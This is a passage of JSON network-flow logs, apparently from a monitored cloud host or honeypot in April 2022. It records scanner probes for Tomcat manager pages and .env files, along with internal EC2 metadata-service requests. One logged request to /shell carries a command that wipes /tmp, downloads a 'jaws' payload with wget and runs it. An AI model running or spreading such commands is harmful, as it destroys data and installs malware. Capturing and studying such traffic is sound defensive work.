\r\n\r\n\r\n","dest_headers":"HTTP/1.1 400 Bad Request\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 04:54:51 GMT\r\nContent-Type: text/html\r\nContent-Length: 157\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":157,"flow_id":"14430dd9-4ccd-4aa1-8ac1-7ca769673446","http_comment":"HTTP/1.1 400 Bad Request","http_content_length":157,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /ab2h HTTP/1.1","server":"nginx/1.21.5","src_headers":"GET /ab2h HTTP/1.1\r\n\r\n","src_ip":"157.245.70.127","src_mac":"02:A5:92:DA:49:85","src_port":58628,"status":400,"time_taken":157611,"transport":"tcp","uri":"/ab2h","uri_path":"/ab2h"} {"endtime":"2022-04-06T04:54:51.599364Z","timestamp":"2022-04-06T04:54:51.599262Z","bytes":331,"bytes_in":22,"bytes_out":309,"dest_content":"\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx/1.21.5
\r\n\r\n\r\n","dest_headers":"HTTP/1.1 400 Bad Request\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 04:54:51 GMT\r\nContent-Type: text/html\r\nContent-Length: 157\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":157,"flow_id":"b08a3979-e73a-4804-87a7-0c05c120a682","http_comment":"HTTP/1.1 400 Bad Request","http_content_length":157,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /ab2g HTTP/1.1","server":"nginx/1.21.5","src_headers":"GET /ab2g HTTP/1.1\r\n\r\n","src_ip":"157.245.70.127","src_mac":"02:A5:92:DA:49:85","src_port":58120,"status":400,"time_taken":160156,"transport":"tcp","uri":"/ab2g","uri_path":"/ab2g"} {"endtime":"2022-04-06T04:36:26.807321Z","timestamp":"2022-04-06T04:36:26.805290Z","bytes":1414,"bytes_in":169,"bytes_out":1245,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /script

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1089\r\nDate: Wed, 06 Apr 2022 04:36:26 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1089,"flow_id":"3a88ac91-f30f-480d-b678-5cbf2a954ac8","http_comment":"HTTP/1.1 404 ","http_content_length":1089,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /script HTTP/1.1","src_headers":"GET /script HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"209.141.40.224","src_mac":"02:A5:92:DA:49:85","src_port":60160,"status":404,"time_taken":38607,"transport":"tcp","uri":"/script","uri_path":"/script"} {"endtime":"2022-04-06T04:26:05.957189Z","timestamp":"2022-04-06T04:26:05.955720Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 04:26:05 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"504d77c7-2bf2-40e1-85f7-4f7b4e13b337","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"188.166.125.81","src_mac":"02:A5:92:DA:49:85","src_port":58760,"status":404,"time_taken":162404,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T04:19:45.074531Z","timestamp":"2022-04-06T04:19:45.073167Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 04:19:45 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"6432434d-bb3d-432a-90d9-c32dadf5cc2f","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.61.188.28","src_mac":"02:A5:92:DA:49:85","src_port":34996,"status":404,"time_taken":474075,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T04:11:42.453487Z","timestamp":"2022-04-06T04:11:42.453119Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 04:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"53861569-7642-4e0d-8569-75191b835dda","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":32980,"status":404,"time_taken":374,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T04:11:42.451874Z","timestamp":"2022-04-06T04:11:42.451314Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 03:19:34 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 04:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"0937e126-9c76-419e-a32d-a591eef156a4","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":32976,"status":200,"time_taken":568,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T04:02:06.081803Z","timestamp":"2022-04-06T04:02:06.081628Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 04:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"b62be595-a182-4c24-8efe-4d1e7b89cf1c","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":44330,"status":404,"time_taken":193,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T04:02:06.081148Z","timestamp":"2022-04-06T04:02:06.080909Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 04:01:58 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 04:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"3ecaee97-3b29-445f-94c4-644267c7bbf1","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":44328,"status":200,"time_taken":278,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T04:01:59.872676Z","timestamp":"2022-04-06T04:01:59.872485Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 04:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"106873a2-482b-482a-be0d-894738d07084","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":38730,"status":404,"time_taken":216,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T04:01:59.871979Z","timestamp":"2022-04-06T04:01:59.871711Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 18000\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 03:29:47 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 04:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"f08cbc95-b089-4fed-946d-0d0fab877614","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":38728,"status":200,"time_taken":322,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T03:59:30.140803Z","timestamp":"2022-04-06T03:59:30.140803Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"069f04b4-26a0-4e36-b65a-7b7f78744da3","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":55390,"time_taken":169482,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T03:48:05.111919Z","timestamp":"2022-04-06T03:48:05.111919Z","bytes":225,"bytes_in":225,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"d0eb59d5-f40f-4377-b7fa-0768c3c11f4f","form_data":"cd /tmp;rm -rf *;wget 0.0.0.0/jaws;sh /tmp/jaws","http_method":"GET","http_user_agent":"Hello, world","protocol_stack":"ip:tcp:http","request":"GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1","site":"127.0.0.1:80","src_headers":"GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: 127.0.0.1:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n","src_ip":"47.94.164.39","src_mac":"02:A5:92:DA:49:85","src_port":49418,"time_taken":169095,"transport":"tcp","uri":"/shell?cd /tmp;rm -rf *;wget 0.0.0.0/jaws;sh /tmp/jaws","uri_path":"/shell","uri_query":"cd /tmp;rm -rf *;wget 0.0.0.0/jaws;sh /tmp/jaws"} {"endtime":"2022-04-06T03:40:49.877448Z","timestamp":"2022-04-06T03:40:49.877448Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"bc3190c7-349f-4d21-a9b3-db395a131b36","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.218","src_mac":"02:A5:92:DA:49:85","src_port":50162,"time_taken":191716,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T03:21:52.794944Z","timestamp":"2022-04-06T03:21:52.793377Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 03:21:52 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"6b9f3161-44c8-4ceb-b581-b9055487fed5","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.61.187.129","src_mac":"02:A5:92:DA:49:85","src_port":40090,"status":404,"time_taken":88425,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T03:11:42.451179Z","timestamp":"2022-04-06T03:11:42.450974Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 03:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"692b90d1-4532-4eb0-b517-07f5136b4a00","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KDkIWPWS6Q6l-pn37lZdhM9jOVi85ZZMxQcmck_xZeWGA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":31548,"status":404,"time_taken":215,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T03:11:42.450527Z","timestamp":"2022-04-06T03:11:42.450048Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 02:21:59 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 03:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"769c7486-5051-4c1b-95ce-7f41b583e89c","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KCF5m4b0i9vs9BP2y0HfqBxoV2c8wfOFdD6SyVAqQ57VQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":31546,"status":200,"time_taken":500,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T03:02:06.082606Z","timestamp":"2022-04-06T03:02:06.082409Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 03:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"7487d6e9-2519-4f83-8592-329e0db97c6d","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":46306,"status":404,"time_taken":203,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T03:02:06.081488Z","timestamp":"2022-04-06T03:02:06.081284Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 02:04:12 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 03:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"8d9139ec-c696-41c5-a12f-e3a3b2c638c7","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":46302,"status":200,"time_taken":210,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T03:01:59.874191Z","timestamp":"2022-04-06T03:01:59.873829Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 03:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"62482ed2-ea1f-4f1a-ac95-f5f8a86f5118","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":37302,"status":404,"time_taken":379,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T03:01:59.872515Z","timestamp":"2022-04-06T03:01:59.872154Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 21600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 02:27:35 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 03:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"68a6c2be-261f-4571-adb1-91bf58ddc42a","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain 